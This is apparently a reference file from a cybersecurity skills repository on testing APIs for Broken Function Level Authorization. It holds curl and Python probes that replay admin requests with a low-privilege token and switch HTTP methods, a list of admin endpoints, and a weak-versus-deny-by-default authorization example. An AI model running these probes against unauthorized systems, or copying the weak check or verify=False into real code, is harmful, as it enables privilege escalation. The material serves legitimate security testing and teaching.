Anthropic-Cybersecurity-Skills/skills/exploiting-broken-function-level-authorization/references/api-reference.md
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00


# API Reference: Broken Function Level Authorization (BFLA)

**OWASP API5:2023 — Broken Function Level Authorization**

## Description

API endpoints expose functions that should be restricted to specific roles. Low-privileged users can invoke admin-level functionality.

## Common Patterns

| Pattern | Example |
|---|---|
| Guessable admin paths | `/api/admin/users` |
| Method switching | `POST` allowed but `PUT` bypasses auth |
| Role parameter manipulation | `{"role": "admin"}` in request |
| Vertical privilege escalation | User accessing admin endpoints |

## Testing Methodology

### Step 1: Discover Endpoints

```bash
# From OpenAPI spec
curl https://api.target.com/swagger.json | jq '.paths | keys'

# From JavaScript source (matches quoted paths such as "/api/..." or '/api/...')
grep -oE "[\"']/api/[^\"']+" app.js
```

### Step 2: Test with Low-Priv Token

```bash
curl -H "Authorization: Bearer <low_priv_token>" \
     https://api.target.com/api/admin/users
```

### Step 3: Test HTTP Method Switching

```bash
# If GET returns 403, try POST/PUT/DELETE
curl -X PUT -H "Authorization: Bearer <low_priv_token>" \
     https://api.target.com/api/admin/users/1
```

## Python requests Library

### Request with Token

```python
import requests

headers = {"Authorization": f"Bearer {token}"}  # token: the low-privilege token under test
resp = requests.get(url, headers=headers, timeout=10, verify=False)  # verify=False skips TLS certificate checks
```

### Method Switching

```python
import requests

# Replay the same URL with every verb; success for a verb the UI never uses points at a missing check
for method in ["GET", "POST", "PUT", "DELETE", "PATCH"]:
    resp = requests.request(method, url, headers=headers, timeout=10)
    if resp.status_code < 400:
        print(f"Accessible via {method}: {resp.status_code}")
```
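
The server-side cause of the "method switching" and "role parameter manipulation" rows above, shown as an added example that is not part of this reference: a weak check bolted onto one handler beside a deny-by-default check keyed on (method, path) with the role taken only from the verified token. `ROUTE_ACL`, the paths in it and the function names are constructed for illustration.

```python
"""Function-level authorization: weak per-handler check vs deny-by-default check."""

# Constructed route table (assumption, not from the original reference):
# every (method, path template) lists the roles allowed to invoke it.
ROUTE_ACL = {
    ("GET", "/api/admin/users"): {"admin"},
    ("POST", "/api/admin/users"): {"admin"},
    ("PUT", "/api/admin/users/{id}"): {"admin"},
    ("DELETE", "/api/admin/users/{id}"): {"admin"},
    ("GET", "/api/users/me"): {"user", "admin"},
}


def normalize_path(path):
    """Strip the query string and collapse numeric segments to {id}."""
    parts = path.split("?", 1)[0].rstrip("/").split("/")
    return "/".join("{id}" if p.isdigit() else p for p in parts) or "/"


def authorize_weak(method, path, token_role, body):
    """The API5 anti-pattern: the role check lives in the GET handler only,
    and the role is read from the request body when present."""
    role = body.get("role", token_role)            # role parameter manipulation
    if method == "GET" and path.startswith("/api/admin") and role != "admin":
        return 403
    return 200                                     # PUT/DELETE fall straight through


def authorize(method, path, token_role, body):
    """Deny by default: the role comes only from the verified token, and
    every (method, path) pair must be explicitly allowed for that role."""
    template = normalize_path(path)
    route = (method.upper(), template)
    if route not in ROUTE_ACL:
        known_path = any(p == template for _, p in ROUTE_ACL)
        return 405 if known_path else 404          # not routed: never reaches a handler
    if token_role not in ROUTE_ACL[route]:
        return 403                                 # routed, but this role may not call it
    return 200


if __name__ == "__main__":
    low = "user"
    print("weak  PUT /api/admin/users/1 ->", authorize_weak("PUT", "/api/admin/users/1", low, {}))
    print("fixed PUT /api/admin/users/1 ->", authorize("PUT", "/api/admin/users/1", low, {}))
```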

## Common Admin Endpoints to Test

```text
/admin
/api/admin
/api/v1/admin/users
/api/internal
/manage
/api/config
/api/debug
/api/users/all
/api/system/settings
/graphql (with admin mutations)
```

## Burp Suite — Authorization Testing

### Autorize Extension

  1. Install Autorize from BApp Store
  2. Set low-privilege cookie/token
  3. Browse application as admin
  4. Autorize replays requests with low-priv token
  5. Compare responses for authorization bypass

## Response Analysis

| Indicator | Meaning |
|---|---|
| 200 with data | Full access (vulnerability) |
| 200 empty body | Possible partial bypass |
| 403 Forbidden | Properly restricted |
| 401 Unauthorized | Auth required |
| 405 Method Not Allowed | Method restricted |